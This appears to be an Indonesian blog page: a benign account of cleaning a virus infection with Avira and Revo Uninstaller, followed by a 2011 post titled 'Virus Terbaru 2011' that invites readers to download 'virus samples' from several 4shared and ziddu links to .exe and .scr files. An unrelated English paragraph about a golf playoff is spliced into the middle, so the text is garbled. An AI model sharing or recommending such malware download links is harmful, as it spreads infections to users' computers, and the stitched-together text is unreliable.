Pada awalnya saya memutuskan untuk install ulang windows-nya saja, karena banyaknya file exe dan dll yang terinfeksi. Selain itu windows akan lebih fresh dan tidak perlu perbaikan-perbaikan sistem lagi. Hal itu mungkin benar, tetapi karena banyaknya program yang sudah di install di komputer membuat saya berfikir ulang, karena setelah install windows, harus menginstall driver dan masih harus menginstall berbagai aplikasi-aplikasi lainnya, jadi cukup memakan waktu dan belum tentu semua program ada masternya.
Alternatif berikutnya adalah me-repair (memperbaiki) installasi windows. Tetapi sebelumnya saya coba memeriksa hasil scan avira, file-file atau program apa saja yang terinfeksi virus. Dengan melihat lokasinya, ternyata tidak semua program terinfeksi, hanya aplikasi-aplikasi yang sering digunakan saja dan beberapa driver komputer. Dan saya lihat sebagian besar file sistem windows masih aman, hanya aplikasi seperti windows media player yang juga terinfeksi. Sehingga sepertinya tidak perlu repair windows.
Selanjutnya program yang exe atau dll-nya terinfeksi saya uninstall kemudian di install ulang, dengan bantuan revo uninstaller. Termasuk install ulang beberapa driver yang sudah terinfeksi. Setelah semuanya beres, saya ulangi scan windows dengan avira dan hasilnya tidak ada lagi yang terinfeksi, dan pogram-program lainnya juga sudah berjalan lancar.

Kamis, 27 Oktober 2011

Virus Terbaru 2011

The pair went for playoff holes with Larrazabal constantly chatting in Sergio’s ear and when he wasn’t doing that was talking into the camera “I get to play France, Scotland and the Open!” he beamed, mid playoff. And it might have been that carefree attitude that carried him through, because he matched Garcia for four playoff holes and finally pipped him on the fifth. Garcia raced his eagle putt four foot past, and same old story, you know the rest


Virus terbaru 2011, yupz, pasti setiap pergantian tahun virus komputer selalu bermunculan. hemmm sebetulnya saya kurang jelas apa nama dari virus ini. tapi ini ada sedikit sampel virus yang baru muncul. anda bisa dwonload sesuka anda.

tapi, hati-hati cara menjinakkannya.. komputer anda bisa MATOT, jika anda tidak berhati -hati,

cekidot:
http://www.4shared.com/file/-b8E4nJx/fuemee.html

http://www.4shared.com/file/W9W8eVQQ/mdcoj.html

http://www.ziddu.com/download/12769652/x.exe.html

http://www.ziddu.com/downloadlink/12769651/mdcoj.scr

http://www.ziddu.com/downloadlink/12769635/fuemee.exe

http://www.ziddu.com/downloadlink/12769651/mdcoj.scr